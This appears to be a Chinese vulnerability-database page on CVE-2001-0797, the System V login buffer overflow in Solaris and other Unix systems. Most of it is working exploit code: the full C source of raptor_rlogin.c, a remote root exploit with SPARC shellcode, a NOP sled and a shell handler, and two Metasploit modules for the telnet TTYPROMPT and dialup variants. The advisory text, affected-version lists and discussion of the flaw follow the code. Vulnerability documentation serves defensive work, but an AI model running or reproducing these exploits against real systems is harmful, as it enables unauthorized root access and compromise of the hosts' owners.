#include <arpa/inet.h>

#define	INFO1	"raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
#define	INFO2	"Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define	BUFSIZE	3000			// max size of the evil buffer
#define	RETADDR	0x27184			// retaddr, should be reliable
#define	TIMEOUT	10			// net_read() default timeout
#define	CMD	"id;uname -a;uptime;\n"	// executed upon exploitation

char sc[] = /* Solaris/SPARC special shellcode (courtesy of inode) */
/* execve() + exit() */
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4"
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08";

char sparc_nop[] = /* Solaris/SPARC special nop (xor %sp, %sp, %o0) */
"\x90\x1b\x80\x0e";

/* prototypes */
int	exploit_addchar(unsigned char *ww, unsigned char wc);
void	fatalerr(char *func, char *error, int fd);
int	net_connect(char *host, int port, int timeout);
int	net_read(int fd, char *buf, int size, int timeout);
int	net_resolve(char *host);
int	sc_copy(unsigned char *buf, char *str, long len);
void	set_val(char *buf, int pos, int val);
void	shell(int fd);
void	usage(char *progname);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], *p = buf;
	char	c, *host = NULL, term[] = "vt100/9600";
	int	fd, i, found, len;
	int	timeout = TIMEOUT, debug = 0;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* parse command line */
	if (argc < 2)
		usage(argv[0]);

	while ((c = getopt(argc, argv, "dh:t:")) != EOF)
		switch(c) {
		case 'h':
			host = optarg;
			break;
		case 't':
			timeout = atoi(optarg);
			break;
		case 'd':
			debug = 1;
			break;
		default:
			usage(argv[0]);
		}

	if (!host)
		usage(argv[0]);

	/* connect to the target host */
	fd = net_connect(host, 513, 10);
	fprintf(stderr, "# connected to remote host: %s\n", host);

	/* signal handling */
	signal(SIGPIPE, SIG_IGN);

	/* begin the rlogin session */
	memset(buf, 0, sizeof(buf));

	if (send(fd, buf, 1, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	if (net_read(fd, buf, sizeof(buf), timeout) < 0)
		fatalerr("error", "Timeout reached in rlogin session", fd);

	/* dummy rlogin authentication */
	memcpy(p, "foo", 3);		// local login name
	p += 4;
	memcpy(p, "bar", 3);		// remote login name
	p += 4;
	memcpy(p, term, sizeof(term));	// terminal type
	p += sizeof(term);

	fprintf(stderr, "# performing dummy rlogin authentication\n");
	if (send(fd, buf, p - buf, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for password prompt", fd);

	/* send a dummy password */
	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for login prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# waiting for login prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "ogin: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for login prompt", fd);

	fprintf(stderr, "# returning into 0x%08x\n", RETADDR);

	/* for debugging purposes */
	if (debug) {
		printf("# debug: press enter to continue");
		scanf("%c", &c);
	}

	/* prepare the evil buffer */
	memset(buf, 0, sizeof(buf));
	p = buf;

	/* login name */
	memcpy(p, "foo ", 4);
	p += 4;

	/* return address (env) */
	set_val(p, 0, RETADDR);
	p += 4;
	memcpy(p, " ", 1);
	p++;

	/* trigger the overflow (env) */
	for (i = 0; i < 60; i++, p += 2)
		memcpy(p, "a ", 2);

	/* padding */
	memcpy(p, " BBB", 4);
	p += 4;

	/* nop sled and shellcode */
	for (i = 0; i < 398; i++, p += 4)
		memcpy(p, sparc_nop, 4);
	p += sc_copy(p, sc, sizeof(sc) - 1);

	/* padding */
	memcpy(p, "BBB ", 4);
	p += 4;

	/* pam_handle_t: minimal header */
	memcpy(p, "CCCCCCCCCCCCCCCC", 16);
	p += 16;
	set_val(p, 0, RETADDR);	// must be a valid address
	p += 4;
	set_val(p, 0, 0x01);
	p += 4;

	/* pam_handle_t: NULL padding */
	for (i = 0; i < 52; i++, p += 4)
		set_val(p, 0, 0x00);

	/* pam_handle_t: pameptr must be the 65th ptr */
	memcpy(p, "\x00\x00\x00 AAAA\n", 9);
	p += 9;

	/* send the evil buffer, 256 chars a time */
	len = p - buf;
	p = buf;
	while (len > 0) {
		fprintf(stderr, "#");
		i = len > 0x100 ? 0x100 : len;
		send(fd, p, i, 0);
		len -= i;
		p += i;
		if (len)
			send(fd, "\x04", 1, 0);
		usleep(500000);
	}
	fprintf(stderr, "\n");
	
	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# evil buffer sent, waiting for password prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	fprintf(stderr, "# password prompt received, waiting for shell\n");

	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for shell prompt */
	memset(buf, 0, sizeof(buf));
	found = 0;

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "# ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	/* connect to the remote shell */
	fprintf(stderr, "# shell prompt detected, successful exploitation\n\n");
	shell(fd);

	exit(0);
}

/*
 * exploit_addchar(): char translation for pam (ripped from scut)
 */
int exploit_addchar(unsigned char *ww, unsigned char wc)
{
	unsigned char * wwo = ww;

	switch (wc) {
	case ('\\'):
		*ww++ = '\\';
		*ww++ = '\\';
		break;
	case (0xff):
	case ('\n'):
	case (' '):
	case ('\t'):
		*ww++ = '\\';
		*ww++ = ((wc & 0300) >> 6) + '0';
		*ww++ = ((wc & 0070) >> 3) + '0';
		*ww++ = (wc & 0007) + '0';
		break;
	default:
		*ww++ = wc;
		break;
	}

	return (ww - wwo);
}

/*
 * fatalerr(): error handling routine
 */
void fatalerr(char *func, char *error, int fd)
{
	fprintf(stderr, "%s: %s\n", func, error);
	close(fd);
	exit(1);
}

/*
 * net_connect(): simple network connect with timeout
 */
int net_connect(char *host, int port, int timeout)
{
	int			fd, i, flags, sock_len;
	struct sockaddr_in	sin;
	struct timeval		tv;
	fd_set			fds;

	/* allocate a socket */
	if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("socket");
		exit(1);
	}

	/* bind a privileged port (FIXME) */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);
	for (i = 1023; i > 0; i--) {
		sin.sin_port = htons(i);
		if (!(bind(fd, (struct sockaddr *)&sin, sizeof(sin))))
			break;
	}
	if (i == 0)
		fatalerr("error", "Can't bind a privileged port (must be root)", fd);

	/* resolve the peer address */
	sin.sin_port = htons(port);
	if (!(sin.sin_addr.s_addr = net_resolve(host)))
		fatalerr("error", "Can't resolve hostname", fd);

	/* set non-blocking */
	if ((flags = fcntl(fd, F_GETFL, 0)) < 0)
		fatalerr("fcntl", strerror(errno), fd);
	if (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
		fatalerr("fcntl", strerror(errno), fd);

	/* connect to remote host */
	if (!(connect(fd, (struct sockaddr *)&sin, sizeof(sin)))) {
		if (fcntl(fd, F_SETFL, flags) < 0)
			fatalerr("fcntl", strerror(errno), fd);
		return(fd);
	}
	if (errno != EINPROGRESS)
		fatalerr("error", "Can't connect to remote host", fd);

	/* set timeout */
	tv.tv_sec = timeout;
	tv.tv_usec = 0;

	/* setup select structs */
	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select */
	if (select(FD_SETSIZE, NULL, &fds, NULL, &tv) <= 0)
		fatalerr("error", "Can't connect to remote host", fd);
	
	/* check if connected */
	sock_len = sizeof(sin);
	if (getpeername(fd, (struct sockaddr *)&sin, &sock_len) < 0)
		fatalerr("error", "Can't connect to remote host", fd);
	if (fcntl(fd, F_SETFL, flags) < 0)
		fatalerr("fcntl", strerror(errno), fd);
	return(fd);
}

/*
 * net_read(): non-blocking read from fd
 */
int net_read(int fd, char *buf, int size, int timeout)
{
	fd_set		fds;
	struct timeval	wait;
	int		n = -1;

	/* set timeout */
	wait.tv_sec = timeout;
	wait.tv_usec = 0;

	memset(buf, 0, size);

	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select with timeout */
	if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
		perror("select");
		exit(1);
	}

	/* read data if any */
	if (FD_ISSET(fd, &fds))
		n = read(fd, buf, size);

	return n;
}

/*
 * net_resolve(): simple network resolver
 */
int net_resolve(char *host)
{
	struct in_addr	addr;
	struct hostent	*he;

	memset(&addr, 0, sizeof(addr));

	if ((addr.s_addr = inet_addr(host)) == -1) {
		if (!(he = (struct hostent *)gethostbyname(host)))
			return(0);
		memcpy((char *)&addr.s_addr, he->h_addr, he->h_length);
	}
	return(addr.s_addr);
}

/*
 * sc_copy(): copy the shellcode, using exploit_addchar()
 */
int sc_copy(unsigned char *buf, char *str, long len)
{
	unsigned char	*or = buf;
	int 		i;

	for(i = 0; i < len; i++)
		buf += exploit_addchar(buf, str[i]);

	return(buf - or);
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] =	(val & 0xff000000) >> 24;
	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
	buf[pos + 3] =	(val & 0x000000ff);
}

/*
 * shell(): semi-interactive shell hack
 */
void shell(int fd)
{
	fd_set	fds;
	char	tmp[128];
	int	n;

	/* quote Hvar 2004 */
	fprintf(stderr, "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n");

	/* execute auto commands */
	write(1, "# ", 2);
	write(fd, CMD, strlen(CMD));

	/* semi-interactive shell */
	for (;;) {
		FD_ZERO(&fds);
		FD_SET(fd, &fds);
		FD_SET(0, &fds);

		if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
			perror("select");
			break;
		}

		/* read from fd and write to stdout */
		if (FD_ISSET(fd, &fds)) {
			if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
				fprintf(stderr, "Goodbye...\n");
				break;
			}
			if (write(1, tmp, n) < 0) {
				perror("write");
				break;
			}
		}

		/* read from stdin and write to fd */
		if (FD_ISSET(0, &fds)) {
			if ((n = read(0, tmp, sizeof(tmp))) < 0) {
				perror("read");
				break;
			}
			if (write(fd, tmp, n) < 0) {
				perror("write");
				break;
			}
		}
	}

	close(fd);
	exit(1);
}

void usage(char *progname)
{
	fprintf(stderr, "usage: %s [-h host] [-t timeout] [-d]\n\n", progname);
	fprintf(stderr, "-h host\t\tdestination ip or fqdn\n");
	fprintf(stderr, "-t timeout\tnet_read() timeout (default: %d)\n", TIMEOUT);
	fprintf(stderr, "-d\t\tturn on debug mode\n\n");
	exit(1);
}
		

- 漏洞信息 (F82329)

Solaris in.telnetd TTYPROMPT Buffer Overflow (PacketStormID:F82329)
2009-10-28 00:00:00
MC,cazz  
exploit,overflow
solaris
CVE-2001-0797
[点击下载]

This Metasploit module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
			'Description'    => %q{
				This module uses a buffer overflow in the Solaris 'login'
			application to bypass authentication in the telnet daemon. 
			},
			'Author'         => [ 'MC', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2001-0797'],
					[ 'OSVDB', '690'],
					[ 'BID', '5531'],

				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars' => '',
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        => 
				[
					['Automatic', { }],
				],
			'DisclosureDate' => 'Jan 18 2002',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(23),
					OptString.new('USER', [ true, "The username to use",     "bin" ]),
				], self.class)
	end

	def exploit
		connect
	
		banner = sock.get_once
		
		print_status('Setting TTYPROMPT...')
		
		req = 
			"\xff\xfc\x18" +
			"\xff\xfc\x1f" +
			"\xff\xfc\x21" +
			"\xff\xfc\x23" +
			"\xff\xfb\x22" +
			"\xff\xfc\x24" +
			"\xff\xfb\x27" +
			"\xff\xfb\x00" +
			"\xff\xfa\x27\x00" +
			"\x00TTYPROMPT" +
			"\x01" + 
			rand_text_alphanumeric(6) + 
			"\xff\xf0"	
		
		sock.put(req)
		sleep(0.25)
		
		print_status('Sending username...')
	
		filler = rand_text_alpha(rand(10) + 1)
 
		req << datastore['USER'] + (" #{filler}" * 65) 
		
		sock.put(req + "\n\n\n")

		sleep(0.25)
		sock.get_once
		
		sock.put(payload.encoded + "\n")

		sleep(0.25)
		
		handler
	end

end

    

- 漏洞信息 (F82226)

System V Derived /bin/login Extraneous Arguments Buffer Overflow (PacketStormID:F82226)
2009-10-27 00:00:00
I)ruid  
exploit,overflow
CVE-2001-0797
[点击下载]

This exploit connects to a system's modem over dialup and exploits a buffer overflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Dialup

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
			'Description'	=> %q{
				This exploit connects to a system's modem over dialup and exploits
				a buffer overlflow vulnerability in it's System V derived /bin/login.
				The vulnerability is triggered by providing a large number of arguments.
			},
         'References'     =>
            [
               [ 'CVE', '2001-0797'],
               [ 'OSVDB', '690'],
               [ 'OSVDB', '691'],
               [ 'BID', '3681'],
               [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
               [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
            ],
			'Version'	=> '$Revision: 6479 $',
			'Author'	=>
				[
					'I)ruid',
				],
			'Arch'		=> ARCH_TTY,
			'Platform'	=> ['unix'],
			'License'	=> MSF_LICENSE,
         'Payload'        =>
            {
               'Space'       => 3000,
               'BadChars'    => '',
			   	'DisableNops' => true,
            },
         'Targets'        =>
            [
               ['Solaris 2.6 - 8 (SPARC)', {
						'Platform' => 'unix',
						'Ret'      => 0x00027184,
						# Solaris/SPARC special shellcode (courtesy of inode)
						# execve() + exit()
						'Shellcode' => 
							"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
							"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
							"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
							"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
						'NOP' => "\x90\x1b\x80\x0e",
					} ],

            ],
         'DefaultTarget' => 0
		))

		register_options(
			[
#				OptString.new('USER', [true, 'User to log in as', 'bin']),
			], self.class
		)

		deregister_options(
		)
	end

	def buildbuf
		print_status("Targeting: #{self.target.name}")

		retaddr   = self.target.ret
		shellcode = self.target['Shellcode']
		nop       = self.target['NOP']

		user      = datastore['USER']
		command   = datastore['COMMAND'] + "\n"

		# prepare the evil buffer
		i = 0
		buf = ''

		# login name
		buf[i,4] = 'bin '
		i += 4

		# return address
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,1] = ' '
		i += 1

		# trigger the overflow
		(0...60).each {|c|
			buf[i,2] = 'a '
			i += 2
		}

		# padding
		buf[i,4] = ' BBB'
		i += 4

		# nop sled and shellcode
		(0...398).each {|c|
			buf[i,nop.size] = nop
			i += nop.size
		}
		shellcode.each_byte {|b|
			c = b.chr
			case 'c'
			when "\\"
				buf[i,2] = "\\\\"
				i += 2
			when "\xff", "\n", " ", "\t"
				buf[i,1] = "\\"
				buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
				buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
				buf[i+3,1] = ( (b & 0007)       + '0').chr
				i += 4
			else
				buf[i,1] = c
				i += 1
			end
		}
		# TODO: need to overwrite/skip the last byte of shellcode?
		#i -= 1

		# padding
		buf[i,4] = 'BBB '
		i += 4

		# pam_handle_t: minimal header
		buf[i,16] = 'CCCCCCCCCCCCCCCC'
		i += 16
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,4] = [0x01].pack('N')
		i += 4

		# pam_handle_t: NULL padding
		(0...52).each {|c|
			buf[i,4] = [0].pack('N')
			i += 4
		}

		# pam_handle_t: pameptr must be the 65th ptr
		buf[i,9] = "\x00\x00\x00 AAAA\n"
		i += 9

		return buf
	end

	def exploit
		buf = buildbuf

		print_status("Dialing Target")
		if not connect_dialup
			print_error("Exiting.")
			return
		end

		print_status("Waiting for login prompt")

		res = dialup_expect(/ogin:\s/i, 10)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match]
			print_error("Login prompt not found... Exiting.")
			disconnect_dialup
			return
		end

		# send the evil buffer, 256 chars at a time
		print_status("Sending evil buffer...")
		#puts Rex::Text.to_hex_dump(buf)
		len = buf.length
		p = 0
		while(len > 0) do
			i = len > 0x100 ? 0x100 : len
			#puts Rex::Text.to_hex_dump(buf[p,i])
			dialup_puts(buf[p,i])
			len -= i
			p += i
#			if len > 0
#				puts Rex::Text.to_hex_dump("\x04")
#				dialup_puts("\x04") if len > 0
#			end
			sleep 0.5
		end

		# wait for password prompt
		print_status("Waiting for password prompt")
		res = dialup_expect(/assword:/i, 30)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match] 
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end	

		print_status("Password prompt received, waiting for shell")
		dialup_puts("pass\n")

		res = dialup_expect(/#\s/i, 20)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match]
			print_error("Shell not found.")
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Success!!!")
		handler

		disconnect_dialup
	end

end

    

- 漏洞信息 (F35500)

raptor_rlogin.c (PacketStormID:F35500)
2004-12-31 00:00:00
Marco Ivaldi  0xdeadbeef.info
exploit,remote,root
solaris
CVE-2001-0797
[点击下载]

Remote root exploit for rlogin on Solaris/SPARC 2.5.1/2.6/7/8. This remote root exploit uses the (old) System V based /bin/login vulnerability via the rlogin attack vector, returning into the .bss section to effectively bypass the non-executable stack protection (noexec_user_stack=1 in /etc/system).

- 漏洞信息

690
Unix SysV Telnet login Environment Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Third-party Verified

- 漏洞描述

A buffer overflow exists in multiple SystemV-based operating systems. The login application fails to validate data received via telnet resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2001-12-12 Unknow
2004-12-22 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, many vendors have released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor System V Derived 'login' Buffer Overflow Vulnerability
Boundary Condition Error 3681
Yes No
2001-12-12 12:00:00 2007-11-15 12:39:00
Discovered by Mark Dowd of ISS X-Force.

- 受影响的程序版本

Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun Solaris 2.3
Sun Solaris 2.2
Sun Solaris 2.1
Sun Solaris 2.0
SGI IRIX 3.3.3
SGI IRIX 3.3.2
SGI IRIX 3.3.1
SGI IRIX 3.3
SGI IRIX 3.2
SCO Open Server 5.0.6 a
SCO Open Server 5.0.6
SCO Open Server 5.0.5
SCO Open Server 5.0.4
SCO Open Server 5.0.3
SCO Open Server 5.0.2
SCO Open Server 5.0.1
SCO Open Server 5.0
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 5.1
HP HP-UX (VVOS) 11.0.4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.0 1
HP HP-UX 10.0
Cisco Voice Services Provisioning Tool
+ Sun Solaris 2.6
Cisco Signaling Controller 2200
+ Sun Solaris 2.5.1
+ Sun Solaris 2.6
Cisco Secure IDS Network Sensor 3.0 (2)S6
Cisco Secure IDS Network Sensor 3.0
Cisco PGW2200 PSTN Gateway
+ Sun Solaris 2.6
Cisco Billing and Management Server
+ Sun Solaris 2.6
Cisco Secure IDS Network Sensor 3.0 (5)

- 不受影响的程序版本

Cisco Secure IDS Network Sensor 3.0 (5)

- 漏洞讨论

The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH.

Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'.

Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A publicly available exploit has been written for Solaris i386 systems. An unpublished exploit for Solaris/SPARC systems is in circulation in the underground.

This issue is also exploitable by setting the TTYPROMPT environment variable to contain six bytes of data and then passing a string containing 65 " c" character combinations, followed by a newline, to a telnet service accessing the vulnerable login.

A newer exploit has been made available.

- 解决方案

According to CERT, HP's response is that the telnet daemon shipped with HP-UX contains the buffer overflow but is not exploitable. Despite this, administrators are urged to take appropriate steps (see above) to be careful.


Cisco Billing and Management Server

Sun Solaris 8_sparc

Sun Solaris 2.6_x86

IBM AIX 5.1

Sun Solaris 7.0

Cisco Signaling Controller 2200

Sun Solaris 7.0_x86

Cisco PGW2200 PSTN Gateway

Sun Solaris 2.6

Sun Solaris 8_x86

Cisco Voice Services Provisioning Tool

Sun Solaris 2.5.1

Sun Solaris 2.5.1 _x86

Cisco Secure IDS Network Sensor 3.0 (2)S6

Cisco Secure IDS Network Sensor 3.0

IBM AIX 4.3

IBM AIX 4.3.1

IBM AIX 4.3.2

IBM AIX 4.3.3

SCO Open Server 5.0

SCO Open Server 5.0.1

SCO Open Server 5.0.2

SCO Open Server 5.0.3

SCO Open Server 5.0.4

SCO Open Server 5.0.5

SCO Open Server 5.0.6

SCO Open Server 5.0.6 a

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站